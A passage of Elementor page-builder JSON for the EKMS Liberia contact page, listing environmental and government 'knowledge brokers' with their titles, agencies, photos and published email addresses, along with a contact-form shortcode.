ion\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a 